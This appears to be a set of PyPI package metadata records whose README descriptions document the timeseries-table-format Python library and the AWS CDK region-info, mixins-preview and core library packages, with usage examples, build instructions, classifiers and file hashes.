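The real preview additionally bounds columns (`max_cols`, left/right) and clips cell text (`max_cell_chars`) before rendering HTML, but the head/tail truncation follows the same shape.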
## Quickstart: create → append → query ```python import tempfile from pathlib import Path import pyarrow as pa import pyarrow.parquet as pq import timeseries_table_format as ttf with tempfile.TemporaryDirectory() as d: table_root = Path(d) / "my_table" tbl = ttf.TimeSeriesTable.create( table_root=str(table_root), time_column="ts", bucket="1h", entity_columns=["symbol"], timezone=None, ) seg_path = table_root / "incoming" / "prices.parquet" seg_path.parent.mkdir(parents=True, exist_ok=True) pq.write_table( pa.table( { "ts": pa.array([0, 3_600 * 1_000_000, 7_200 * 1_000_000], type=pa.timestamp("us")), "symbol": pa.array(["NVDA", "NVDA", "NVDA"], type=pa.string()), "close": pa.array([10.0, 20.0, 30.0], type=pa.float64()), } ), str(seg_path), ) tbl.append_parquet(str(seg_path)) sess = ttf.Session() sess.register_tstable("prices", str(table_root)) out = sess.sql("select ts, symbol, close from prices order by ts") print(out) # pyarrow.Table ``` > **Bucket size (important):** `bucket=1h` does **not** resample your data. It defines the time grid used for overlap detection and coverage tracking. > Example: with `bucket=1h`, timestamps `10:05` and `10:55` fall into the same bucket (10:00–11:00). 
> See https://mag1cfrog.github.io/timeseries-table-format/concepts/bucketing_and_overlap/ ## Join multiple tables ```python # Aligned with python/examples/register_and_join_two_tables.py import tempfile from pathlib import Path import pyarrow as pa import pyarrow.parquet as pq import timeseries_table_format as ttf with tempfile.TemporaryDirectory() as d: base_dir = Path(d) prices_root = base_dir / "prices_tbl" prices = ttf.TimeSeriesTable.create( table_root=str(prices_root), time_column="ts", bucket="1h", entity_columns=["symbol"], timezone=None, ) prices_seg = base_dir / "prices.parquet" pq.write_table( pa.table( { "ts": pa.array([0, 3_600 * 1_000_000], type=pa.timestamp("us")), "symbol": pa.array(["NVDA", "NVDA"], type=pa.string()), "close": pa.array([1.0, 2.0], type=pa.float64()), } ), str(prices_seg), ) prices.append_parquet(str(prices_seg)) volumes_root = base_dir / "volumes_tbl" volumes = ttf.TimeSeriesTable.create( table_root=str(volumes_root), time_column="ts", bucket="1h", entity_columns=["symbol"], timezone=None, ) volumes_seg = base_dir / "volumes.parquet" pq.write_table( pa.table( { "ts": pa.array([0, 3_600 * 1_000_000], type=pa.timestamp("us")), "symbol": pa.array(["NVDA", "NVDA"], type=pa.string()), "volume": pa.array([10, 20], type=pa.int64()), } ), str(volumes_seg), ) volumes.append_parquet(str(volumes_seg)) sess = ttf.Session() sess.register_tstable("prices", str(prices_root)) sess.register_tstable("volumes", str(volumes_root)) out = sess.sql( """ select p.ts as ts, p.symbol as symbol, p.close as close, v.volume as volume from prices p join volumes v on p.ts = v.ts and p.symbol = v.symbol order by p.ts """ ) print(out) # pyarrow.Table ``` ## Parameterized queries DataFusion infers placeholder types from context when possible (e.g. in `WHERE` clauses). If you use placeholders in a `SELECT` projection without type context, you may need an explicit cast. 
```python # Aligned with python/examples/parameterized_queries.py import timeseries_table_format as ttf sess = ttf.Session() out_positional = sess.sql( "select cast($1 as bigint) as x, cast($2 as varchar) as y", params=[1, "hello"], ) out_named = sess.sql( "select cast($a as bigint) as x, cast($b as varchar) as y", params={"a": 2, "b": "world"}, ) print(out_positional) print(out_named) ``` ## Building from source (contributors) Prereqs: - Rust toolchain installed - Python 3.10+ (CI targets 3.10–3.14; examples below use 3.12) - `uv` installed From the repo root: ```bash uv venv -p 3.12 python/.venv uv pip install -p python/.venv/bin/python -e python --group dev python/.venv/bin/python -m pytest ``` Type checking (ty): ```bash uvx ty check --project python ``` Alternative (uses the `python/` dev environment): ```bash cd python uv run ty check ``` Alternative: build with `maturin` directly: ```bash cd python uv venv -p 3.12 .venv uv pip install -p .venv/bin/python pyarrow --group dev uv run -p .venv/bin/python maturin develop .venv/bin/python -m pytest ``` ## Benchmark: SQL conversion (IPC vs C Stream) `Session.sql(...)` returns results as a `pyarrow.Table`. By default, results are exported via the Arrow C Data Interface (C Stream) when supported, and fall back to an in-memory Arrow IPC stream otherwise. 
To compare the two paths and estimate the conversion overhead, run: ```bash cd python uv pip install -p .venv/bin/python numpy uv run -p .venv/bin/python maturin develop --features test-utils .venv/bin/python bench/sql_conversion.py --target-ipc-gb 2 ``` Environment variables (useful for debugging and benchmarks): - `TTF_SQL_EXPORT_MODE=auto|ipc|c_stream` (default: `c_stream`) - `TTF_SQL_EXPORT_DEBUG=1` to emit a debug warning when `auto` falls back from C Stream → IPC - `TTF_SQL_EXPORT_AUTO_RERUN_FALLBACK=1` to re-run the SQL query on C Stream failure in `auto` mode (avoids cloning batches on the hot path, but may change results for non-deterministic queries) Optional: benchmark IPC ZSTD compression (requires building with `ipc-zstd`): ```bash uv run -p .venv/bin/python maturin develop --features test-utils,ipc-zstd .venv/bin/python bench/sql_conversion.py --target-ipc-gb 2 --ipc-compression zstd ``` The script can print a human-friendly terminal summary (`--summary`) and/or write a JSON payload to a file (`--json path`). It reports separate timings for: - end-to-end `Session.sql(...)` - Rust-side query+IPC encode (`_native._testing._bench_sql_ipc`) - Rust-side query+C Stream export (`_native._testing._bench_sql_c_stream`) - Python-side decode/import Large targets can require high peak RAM (IPC bytes + decoded Table + intermediate buffers). Start with `--target-ipc-gb 2` and scale up to `3` or `6` on a machine with plenty of memory. If you hit `Disk quota exceeded`, pass `--tmpdir /path/with/more/space` (the bench uses a temporary directory and cleans it up on exit). ## Troubleshooting - `pip` is building from source / fails with Rust errors: no wheel is available for your platform/Python; install Rust and retry, or use a supported Python/platform combination. - `DataFusionError` about an unknown table name: call `sess.register_tstable("name", "/path/to/table")` first; use `sess.tables()` to list registrations. 
- Append fails with a time column error: the timestamp column must be an Arrow `timestamp(...)`, and the unit should remain consistent across segments (e.g. `timestamp("us")`). - `SchemaMismatchError` on append: the new Parquet segment schema must match the table's adopted schema (column names and types). - SQL errors / parameter placeholders: try an explicit `CAST(...)` for placeholders used in `SELECT` projections.
text/markdown; charset=UTF-8; variant=GFM
null
null
null
null
null
null
[ "Programming Language :: Python :: 3", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Programming Language :: Python :: 3.14" ]
[]
null
null
>=3.10
[]
[]
[]
[ "pyarrow>=23.0.0" ]
[]
[]
[]
[ "Changelog, https://github.com/mag1cfrog/timeseries-table-format/blob/main/crates/timeseries-table-python/CHANGELOG.md", "Documentation, https://mag1cfrog.github.io/timeseries-table-format/", "Issues, https://github.com/mag1cfrog/timeseries-table-format/issues", "Repository, https://github.com/mag1cfrog/times...
twine/6.1.0 CPython/3.13.7
2026-02-19T21:58:34.844525
timeseries_table_format-0.1.3.tar.gz
240,202
91/cd/441867278c27afb60b46cc4389b613968b65d4c01e7761f0746e891d8e98/timeseries_table_format-0.1.3.tar.gz
source
sdist
null
false
75b71d75fc46b94a3bdd5f4cdf097816
ceb8a26da9028f7f6072318725943abdd3c1c751d0ff3a6c2bbf044a4e7a9d77
91cd441867278c27afb60b46cc4389b613968b65d4c01e7761f0746e891d8e98
null
[]
1,013
2.1
aws-cdk.region-info
2.239.0
AWS region information, such as service principal names
# AWS Region-Specific Information Directory

## Usage

Some information used in CDK Applications differs from one AWS region to another, such as service principals used in IAM policies, S3 static website endpoints, ...

### The `RegionInfo` class

The library offers a simple interface to obtain region specific information in the form of the `RegionInfo` class. This is the preferred way to interact with the regional information database:

```python
# Get the information for "eu-west-1":
region = region_info.RegionInfo.get("eu-west-1")

# Access attributes:
region.s3_static_website_endpoint
```

The `RegionInfo` layer is built on top of the Low-Level API, which is described below and can be used to register additional data, including user-defined facts that are not available through the `RegionInfo` interface.

### Low-Level API

This library offers a primitive database of such information so that CDK constructs can easily access regional information. The `FactName` class provides a list of known fact names, which can then be used with the `RegionInfo` to retrieve a particular value:

```python
static_website = region_info.Fact.find("ap-northeast-1", region_info.FactName.S3_STATIC_WEBSITE_ENDPOINT)
```

## Supplying new or missing information

As new regions are released, it might happen that a particular fact you need is missing from the library.
In such cases, the `Fact.register` method can be used to inject the missing fact into the database:

```python
@jsii.implements(region_info.IFact)
class MyFact:
    ...

region_info.Fact.register(MyFact())
```

## Overriding incorrect information

In the event information provided by the library is incorrect, it can be overridden using the same `Fact.register` method demonstrated above, simply adding an extra boolean argument:

```python
@jsii.implements(region_info.IFact)
class MyFact:
    ...

region_info.Fact.register(MyFact(), True)
```

If you happen to have stumbled upon incorrect data built into this library, it is always a good idea to report your findings in a [GitHub issue](https://github.com/aws/aws-cdk/issues), so we can fix it for everyone else!

---

This module is part of the [AWS Cloud Development Kit](https://github.com/aws/aws-cdk) project.
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:31.197278
aws_cdk_region_info-2.239.0.tar.gz
308,025
ee/e4/1f7bc1ae29e9bf76c4d6bf2f8ae0f94736c88046d3b9a693137fc557961d/aws_cdk_region_info-2.239.0.tar.gz
source
sdist
null
false
6df35d8ed75d3c37f16c8b44a3d2d749
228b097b2eaa77c3c647478134e163e4983b73fa903a347dbc737465cf9afd40
eee41f7bc1ae29e9bf76c4d6bf2f8ae0f94736c88046d3b9a693137fc557961d
null
[]
0
2.1
aws-cdk.mixins-preview
2.239.0a0
Preview of CDK Mixins - composable, reusable abstractions that can be applied to any construct (L1, L2 or custom).
# CDK Mixins (Preview) <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> This package provides two main features: 1. **Mixins** - Composable abstractions for adding functionality to constructs 2. **EventBridge Event Patterns** - Type-safe event patterns for AWS resources --- ## CDK Mixins CDK Mixins provide a new, advanced way to add functionality through composable abstractions. Unlike traditional L2 constructs that bundle all features together, Mixins allow you to pick and choose exactly the capabilities you need for constructs. 
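The pick-and-choose mechanics behind Mixins can be sketched in plain Python. These are toy classes invented for illustration (not the actual CDK API): a mixin declares which constructs it `supports` and how to `apply_to` them, and an applier walks through them.

```python
class Mixin:
    """Base class for a composable piece of behavior (toy version)."""
    def supports(self, construct):
        return True

    def apply_to(self, construct):
        raise NotImplementedError


class Bucket:
    """Stand-in for a construct; holds plain properties."""
    def __init__(self):
        self.props = {}


class Versioning(Mixin):
    """Toy mixin that only knows how to configure Bucket objects."""
    def supports(self, construct):
        return isinstance(construct, Bucket)

    def apply_to(self, construct):
        construct.props["versioning"] = "Enabled"


class Mixins:
    """Applies mixins to a construct, skipping unsupported ones."""
    def __init__(self, construct):
        self.construct = construct

    @staticmethod
    def of(construct):
        return Mixins(construct)

    def apply(self, mixin):
        if mixin.supports(self.construct):
            mixin.apply_to(self.construct)
        return self  # chainable, like the real API


bucket = Bucket()
Mixins.of(bucket).apply(Versioning())
print(bucket.props)  # {'versioning': 'Enabled'}
```

Because `apply` checks `supports` first, the same chain of mixins can be pointed at any construct and only the applicable ones take effect, which is the "universal compatibility" property described above.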
### Key Benefits * **Universal Compatibility**: Apply the same abstractions to L1 constructs, L2 constructs, or custom constructs * **Composable Design**: Mix and match features without being locked into specific implementations * **Cross-Service Abstractions**: Use common patterns like encryption across different AWS services * **Escape Hatch Freedom**: Customize resources in a safe, typed way while keeping the abstractions you want ### Basic Usage Mixins use `Mixins.of()` as the fundamental API for applying abstractions to constructs: ```python # Base form: apply mixins to any construct bucket = s3.CfnBucket(scope, "MyBucket") Mixins.of(bucket).apply(EncryptionAtRest()).apply(AutoDeleteObjects()) ``` #### Fluent Syntax with `.with()` For convenience, you can use the `.with()` method for a more fluent syntax: ```python # `.with()` is JavaScript/TypeScript-only; shown here for illustration bucket = s3.CfnBucket(scope, "MyBucket").with(BucketVersioning()).with(AutoDeleteObjects()) ``` The `.with()` method is available after importing `@aws-cdk/mixins-preview/with`, which augments all constructs with this method. It provides the same functionality as `Mixins.of().apply()` but with a more chainable API. > **Note**: The `.with()` fluent syntax is only available in JavaScript and TypeScript. Other jsii languages (Python, Java, C#, and Go) should use the `Mixins.of(...).apply(...)` syntax instead. The import requirement is temporary during the preview phase. Once the API is stable, the `.with()` method will be available by default on all constructs and in all languages.
### Creating Custom Mixins Mixins are simple classes that implement the `IMixin` interface (usually by extending the abstract `Mixin` class): ```python # Simple mixin that enables versioning @jsii.implements(IMixin) class CustomVersioningMixin(Mixin): def supports(self, construct): return isinstance(construct, s3.CfnBucket) def apply_to(self, bucket): bucket.versioning_configuration = { "status": "Enabled" } # Usage bucket = s3.CfnBucket(scope, "MyBucket") Mixins.of(bucket).apply(CustomVersioningMixin()) ``` ### Construct Selection Mixins operate on construct trees and can be applied selectively: ```python # Apply to all constructs in a scope Mixins.of(scope).apply(EncryptionAtRest()) # Apply to specific resource types Mixins.of(scope, ConstructSelector.resources_of_type(s3.CfnBucket.CFN_RESOURCE_TYPE_NAME)).apply(EncryptionAtRest()) # Apply to constructs matching a path pattern Mixins.of(scope, ConstructSelector.by_path("**/*-prod-*/**")).apply(ProductionSecurityMixin()) ``` ### Built-in Mixins #### Cross-Service Mixins **EncryptionAtRest**: Applies encryption to supported AWS resources ```python # Works across different resource types bucket = s3.CfnBucket(scope, "Bucket") Mixins.of(bucket).apply(EncryptionAtRest()) log_group = logs.CfnLogGroup(scope, "LogGroup") Mixins.of(log_group).apply(EncryptionAtRest()) ``` #### S3-Specific Mixins **AutoDeleteObjects**: Configures automatic object deletion for S3 buckets ```python bucket = s3.CfnBucket(scope, "Bucket") Mixins.of(bucket).apply(AutoDeleteObjects()) ``` **BucketVersioning**: Enables versioning on S3 buckets ```python bucket = s3.CfnBucket(scope, "Bucket") Mixins.of(bucket).apply(BucketVersioning()) ``` **BucketBlockPublicAccess**: Enables blocking public access on S3 buckets ```python bucket = s3.CfnBucket(scope, "Bucket") Mixins.of(bucket).apply(BucketBlockPublicAccess()) ``` **BucketPolicyStatementsMixin**: Adds IAM policy statements to a bucket policy ```python # bucket: s3.IBucketRef bucket_policy =
s3.CfnBucketPolicy(scope, "BucketPolicy", bucket=bucket, policy_document=iam.PolicyDocument() ) Mixins.of(bucket_policy).apply(BucketPolicyStatementsMixin([ iam.PolicyStatement( actions=["s3:GetObject"], resources=["*"], principals=[iam.AnyPrincipal()] ) ])) ``` #### ECS-Specific Mixins **ClusterSettings**: Applies one or more cluster settings to ECS clusters ```python import aws_cdk.aws_ecs as ecs from aws_cdk.mixins_preview.aws_ecs.mixins import ClusterSettings cluster = ecs.CfnCluster(scope, "Cluster") Mixins.of(cluster).apply(ClusterSettings([{ "name": "containerInsights", "value": "enhanced" }])) ``` ### Logs Delivery Configures vended logs delivery for supported resources to various destinations: ```python import aws_cdk.mixins_preview.aws_cloudfront.mixins as cloudfront_mixins # Create CloudFront distribution # bucket: s3.Bucket distribution = cloudfront.Distribution(scope, "Distribution", default_behavior=cloudfront.BehaviorOptions( origin=origins.S3BucketOrigin.with_origin_access_control(bucket) ) ) # Create log destination log_group = logs.LogGroup(scope, "DeliveryLogGroup") # Configure log delivery using the mixin (`.with()` is JavaScript/TypeScript-only fluent syntax) distribution.with(cloudfront_mixins.CfnDistributionLogsMixin.CONNECTION_LOGS.to_log_group(log_group)) ``` Configures vended logs delivery for supported resources when a pre-created destination is provided: ```python import aws_cdk.mixins_preview.aws_cloudfront.mixins as cloudfront_mixins # Create CloudFront distribution # bucket: s3.Bucket distribution = cloudfront.Distribution(scope, "Distribution", default_behavior=cloudfront.BehaviorOptions( origin=origins.S3BucketOrigin.with_origin_access_control(bucket) ) ) # Create destination bucket dest_bucket = s3.Bucket(scope, "DeliveryBucket") # Add permissions to bucket to facilitate log delivery bucket_policy = s3.BucketPolicy(scope, "DeliveryBucketPolicy", bucket=dest_bucket, document=iam.PolicyDocument() ) # Create S3
delivery destination for logs destination = logs.CfnDeliveryDestination(scope, "Destination", destination_resource_arn=dest_bucket.bucket_arn, name="unique-destination-name", delivery_destination_type="S3" ) distribution.with(cloudfront_mixins.CfnDistributionLogsMixin.CONNECTION_LOGS.to_destination(destination)) ``` ### L1 Property Mixins For every CloudFormation resource, CDK Mixins automatically generates type-safe property mixins. These allow you to apply L1 properties with full TypeScript support: ```python # `.with()` is JavaScript/TypeScript-only fluent syntax bucket = s3.Bucket(scope, "Bucket").with(CfnBucketPropsMixin( versioning_configuration=CfnBucketPropsMixin.VersioningConfigurationProperty(status="Enabled"), public_access_block_configuration=CfnBucketPropsMixin.PublicAccessBlockConfigurationProperty( block_public_acls=True, block_public_policy=True ) )) ``` Property mixins support two merge strategies: ```python from aws_cdk.mixins_preview.aws_s3.mixins import CfnBucketPropsMixin, CfnBucketMixinProps # bucket: s3.CfnBucket # MERGE (default): Deep merges properties with existing values Mixins.of(bucket).apply(CfnBucketPropsMixin(CfnBucketMixinProps(versioning_configuration=CfnBucketPropsMixin.VersioningConfigurationProperty(status="Enabled")), strategy=PropertyMergeStrategy.MERGE)) # OVERRIDE: Replaces existing property values Mixins.of(bucket).apply(CfnBucketPropsMixin(CfnBucketMixinProps(versioning_configuration=CfnBucketPropsMixin.VersioningConfigurationProperty(status="Enabled")), strategy=PropertyMergeStrategy.OVERRIDE)) ``` Property mixins are available for all AWS services: ```python from aws_cdk.mixins_preview.aws_logs.mixins import CfnLogGroupPropsMixin from aws_cdk.mixins_preview.aws_lambda.mixins import CfnFunctionPropsMixin from aws_cdk.mixins_preview.aws_dynamodb.mixins import CfnTablePropsMixin ``` ### Error Handling Mixins provide comprehensive error handling: ```python # Graceful handling of unsupported constructs
Mixins.of(scope).apply(EncryptionAtRest()) # Skips unsupported constructs # Strict application that requires all constructs to match Mixins.of(scope).require_all().apply(EncryptionAtRest()) ``` --- ## EventBridge Event Patterns CDK Mixins automatically generates typed EventBridge event patterns for AWS resources. These patterns work with both L1 and L2 constructs, providing a consistent interface for creating EventBridge rules. ### Event Patterns Basic Usage ```python from aws_cdk.mixins_preview.aws_s3.events import BucketEvents import aws_cdk.aws_events as events import aws_cdk.aws_events_targets as targets # fn: lambda.Function # Works with L2 constructs bucket = s3.Bucket(scope, "Bucket") bucket_events = BucketEvents.from_bucket(bucket) events.Rule(scope, "Rule", event_pattern=bucket_events.object_created_pattern( object=BucketEvents.ObjectCreated.ObjectType(key=events.Match.wildcard("uploads/*")) ), targets=[targets.LambdaFunction(fn)] ) # Also works with L1 constructs cfn_bucket = s3.CfnBucket(scope, "CfnBucket") cfn_bucket_events = BucketEvents.from_bucket(cfn_bucket) events.CfnRule(scope, "CfnRule", state="ENABLED", event_pattern=cfn_bucket_events.object_created_pattern( object=BucketEvents.ObjectCreated.ObjectType(key=events.Match.wildcard("uploads/*")) ), targets=[events.CfnRule.TargetProperty(arn=fn.function_arn, id="L1")] ) ``` ### Event Pattern Features **Automatic Resource Injection**: Resource identifiers are automatically included in patterns ```python from aws_cdk.mixins_preview.aws_s3.events import BucketEvents # bucket: s3.Bucket bucket_events = BucketEvents.from_bucket(bucket) # Bucket name is automatically injected from the bucket reference pattern = bucket_events.object_created_pattern() ``` **Event Metadata Support**: Control EventBridge pattern metadata ```python from aws_cdk import AWSEventMetadataProps from aws_cdk.mixins_preview.aws_s3.events import BucketEvents import aws_cdk.aws_events as events # bucket: s3.Bucket bucket_events = 
BucketEvents.from_bucket(bucket) pattern = bucket_events.object_created_pattern( event_metadata=AWSEventMetadataProps( region=events.Match.prefix("us-"), version=["0"] ) ) ``` ### Available Events Event patterns are generated for EventBridge events available in the AWS Event Schema Registry. Common examples: **S3 Events**: * `objectCreatedPattern()` - Object creation events * `objectDeletedPattern()` - Object deletion events * `objectTagsAddedPattern()` - Object tagging events * `awsAPICallViaCloudTrailPattern()` - CloudTrail API calls Import events from service-specific modules: ```python from aws_cdk.mixins_preview.aws_s3.events import BucketEvents ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:29.009151
aws_cdk_mixins_preview-2.239.0a0.tar.gz
24,050,993
24/e1/9f8297b81c3065c756a5c8ec5007b523aa08cc198b32a0a01dddbb1bb26b/aws_cdk_mixins_preview-2.239.0a0.tar.gz
source
sdist
null
false
99c7cf82c485c1a13285f13640163d08
5e41fbcbde53709db04f7ad8c14576c9fe7ac327facc62cf3b414841537f2be9
24e19f8297b81c3065c756a5c8ec5007b523aa08cc198b32a0a01dddbb1bb26b
null
[]
0
2.1
aws-cdk-lib
2.239.0
Version 2 of the AWS Cloud Development Kit library
# AWS Cloud Development Kit Library The AWS CDK construct library provides APIs to define your CDK application and add CDK constructs to the application. ## Usage ### Upgrade from CDK 1.x When upgrading from CDK 1.x, remove all dependencies on individual CDK packages from your dependencies file and follow the rest of the sections. ### Installation To use this package, you need to declare this package and the `constructs` package as dependencies. Depending on the kind of project you are developing: For projects that are CDK libraries published to npm, declare them both under the `devDependencies` **and** `peerDependencies` sections. To make sure your library is compatible with the widest range of CDK versions: pick the minimum `aws-cdk-lib` version that your library requires; declare a range dependency with a caret on that version in `peerDependencies`, and declare a point version dependency on that version in `devDependencies`. For example, let's say the minimum version your library needs is `2.38.0`. Your `package.json` should look like this: ```javascript { "peerDependencies": { "aws-cdk-lib": "^2.38.0", "constructs": "^10.5.0" }, "devDependencies": { /* Install the oldest version for testing so we don't accidentally use features from a newer version than we declare */ "aws-cdk-lib": "2.38.0" } } ``` For CDK apps, declare them under the `dependencies` section.
Use a caret so you always get the latest version: ```json { "dependencies": { "aws-cdk-lib": "^2.38.0", "constructs": "^10.5.0" } } ``` ### Use in your code #### Classic import You can use a classic import to get access to each service namespace: ```python from aws_cdk import Stack, App, aws_s3 as s3 app = App() stack = Stack(app, "TestStack") s3.Bucket(stack, "TestBucket") ``` #### Barrel import Alternatively, you can use "barrel" imports: ```python from aws_cdk import App, Stack from aws_cdk.aws_s3 import Bucket app = App() stack = Stack(app, "TestStack") Bucket(stack, "TestBucket") ``` <!--BEGIN CORE DOCUMENTATION--> ## Stacks and Stages A `Stack` is the smallest physical unit of deployment, and maps directly onto a CloudFormation Stack. You define a Stack by defining a subclass of `Stack` -- let's call it `MyStack` -- and instantiating the constructs that make up your application in `MyStack`'s constructor. You then instantiate this stack one or more times to define different instances of your application. For example, you can instantiate it once using a few cheap EC2 instances for testing, and again using more and bigger EC2 instances for production. When your application grows, you may decide that it makes more sense to split it out across multiple `Stack` classes. This can happen for a number of reasons: * You could be starting to reach the maximum number of resources allowed in a single stack (this is currently 500). * You could decide you want to separate out stateful resources and stateless resources into separate stacks, so that it becomes easy to tear down and recreate the stacks that don't have stateful resources. * There could be a single stack with resources (like a VPC) that are shared between multiple instances of other stacks containing your applications. As soon as your conceptual application starts to encompass multiple stacks, it is convenient to wrap them in another construct that represents your logical application.
You can then treat that new unit the same way you used to be able to treat a single stack: by instantiating it multiple times for different instances of your application. You can define a custom subclass of `Stage`, holding one or more `Stack`s, to represent a single logical instance of your application. As a final note: `Stack`s are not a unit of reuse. They describe physical deployment layouts, and as such are best left to application builders to organize their deployments with. If you want to vend a reusable construct, define it as a subclass of `Construct`: the consumers of your construct will decide where to place it in their own stacks. ## Stack Synthesizers Each Stack has a *synthesizer*, an object that determines how and where the Stack should be synthesized and deployed. The synthesizer controls aspects like: * How does the stack reference assets? (Either through CloudFormation parameters the CLI supplies, or because the Stack knows a predefined location where assets will be uploaded). * What roles are used to deploy the stack? These can be bootstrapped roles, roles created in some other way, or just the CLI's current credentials. The following synthesizers are available: * `DefaultStackSynthesizer`: recommended. Uses predefined asset locations and roles created by the modern bootstrap template. Access control is done by controlling who can assume the deploy role. This is the default stack synthesizer in CDKv2. * `LegacyStackSynthesizer`: Uses CloudFormation parameters to communicate asset locations, and the CLI's current permissions to deploy stacks. This is the default stack synthesizer in CDKv1. * `CliCredentialsStackSynthesizer`: Uses predefined asset locations, and the CLI's current permissions. Each of these synthesizers takes configuration arguments.
To configure a stack with a synthesizer, pass it as one of its properties: ```python MyStack(app, "MyStack", synthesizer=DefaultStackSynthesizer( file_assets_bucket_name="amzn-s3-demo-bucket" ) ) ``` For more information on bootstrapping accounts and customizing synthesis, see [Bootstrapping in the CDK Developer Guide](https://docs.aws.amazon.com/cdk/latest/guide/bootstrapping.html). ### STS Role Options You can configure STS options that instruct the CDK CLI on which configuration it should use when assuming the various roles that are involved in a deployment operation. Refer to [the bootstrapping guide](https://docs.aws.amazon.com/cdk/v2/guide/bootstrapping-env.html#bootstrapping-env-roles) for further context. These options are available via the `DefaultStackSynthesizer` properties:

```python
class MyStack(Stack):
    def __init__(self, scope, id, **kwargs):
        super().__init__(scope, id,
            synthesizer=DefaultStackSynthesizer(
                deploy_role_external_id="",
                deploy_role_additional_options={},
                file_asset_publishing_external_id="",
                file_asset_publishing_role_additional_options={},
                image_asset_publishing_external_id="",
                image_asset_publishing_role_additional_options={},
                lookup_role_external_id="",
                lookup_role_additional_options={}
            ),
            **kwargs
        )
```

> Note that the `*additionalOptions` property does not allow passing `ExternalId`
or `RoleArn`, as these options have dedicated properties that configure them. #### Session Tags STS session tags are used to implement [Attribute-Based Access Control](https://docs.aws.amazon.com/IAM/latest/UserGuide/introduction_attribute-based-access-control.html) (ABAC). See [IAM tutorial: Define permissions to access AWS resources based on tags](https://docs.aws.amazon.com/IAM/latest/UserGuide/tutorial_attribute-based-access-control.html). You can pass session tags for each [role created during bootstrap](https://docs.aws.amazon.com/cdk/v2/guide/bootstrapping-env.html#bootstrapping-env-roles) via the `*additionalOptions` property:

```python
class MyStack(Stack):
    def __init__(self, parent, id, **kwargs):
        super().__init__(parent, id,
            synthesizer=DefaultStackSynthesizer(
                deploy_role_additional_options={
                    "Tags": [{"Key": "Department", "Value": "Engineering"}]
                },
                file_asset_publishing_role_additional_options={
                    "Tags": [{"Key": "Department", "Value": "Engineering"}]
                },
                image_asset_publishing_role_additional_options={
                    "Tags": [{"Key": "Department", "Value": "Engineering"}]
                },
                lookup_role_additional_options={
                    "Tags": [{"Key": "Department", "Value": "Engineering"}]
                }
            ),
            **kwargs
        )
```

This will cause the CDK CLI to include session tags when assuming each of these roles during deployment.
Note that the trust policy of the role must contain permissions for the `sts:TagSession` action. Refer to the [IAM user guide on session tags](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_session-tags.html#id_session-tags_permissions-required). * If you are using a custom bootstrap template, make sure the template includes these permissions. * If you are using the default bootstrap template from a CDK version lower than XXXX, you will need to rebootstrap your environment (once). ## Nested Stacks [Nested stacks](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/using-cfn-nested-stacks.html) are stacks created as part of other stacks. You create a nested stack within another stack by using the `NestedStack` construct. As your infrastructure grows, common patterns can emerge in which you declare the same components in multiple templates. You can separate out these common components and create dedicated templates for them. Then use the resource in your template to reference other templates, creating nested stacks. For example, assume that you have a load balancer configuration that you use for most of your stacks. Instead of copying and pasting the same configurations into your templates, you can create a dedicated template for the load balancer. Then, you just use the resource to reference that template from within other templates.
The following example will define a single top-level stack that contains two nested stacks, each with a single Amazon S3 bucket:

```python
class MyNestedStack(cfn.NestedStack):
    def __init__(self, scope, id, **kwargs):
        super().__init__(scope, id, **kwargs)
        s3.Bucket(self, "NestedBucket")

class MyParentStack(Stack):
    def __init__(self, scope, id, **kwargs):
        super().__init__(scope, id, **kwargs)
        MyNestedStack(self, "Nested1")
        MyNestedStack(self, "Nested2")
```

Resource references across nested/parent boundaries (even with multiple levels of nesting) will be wired by the AWS CDK through CloudFormation parameters and outputs. When a resource from a parent stack is referenced by a nested stack, a CloudFormation parameter will automatically be added to the nested stack and assigned from the parent; when a resource from a nested stack is referenced by a parent stack, a CloudFormation output will automatically be added to the nested stack and referenced using `Fn::GetAtt "Outputs.Xxx"` from the parent. Nested stacks also support the use of Docker image and file assets.
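The parent-side wiring described above can be illustrated as plain data. This is a toy sketch of the CloudFormation JSON involved, not CDK code, and the helper name is invented:

```python
def nested_output_reference(nested_stack_logical_id, output_name):
    """Build the Fn::GetAtt expression a parent stack uses to read a nested
    stack's output, following the `Fn::GetAtt "Outputs.Xxx"` shape described
    above (toy illustration of the wiring the CDK performs automatically)."""
    return {"Fn::GetAtt": [nested_stack_logical_id, f"Outputs.{output_name}"]}


# Parent stack reading an (illustrative) bucket-name output of "Nested1"
ref = nested_output_reference("Nested1", "NestedBucketName")
print(ref)  # {'Fn::GetAtt': ['Nested1', 'Outputs.NestedBucketName']}
```

In a real app you never write this by hand; the CDK emits the output on the nested stack and this `Fn::GetAtt` on the parent whenever you reference a nested resource.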
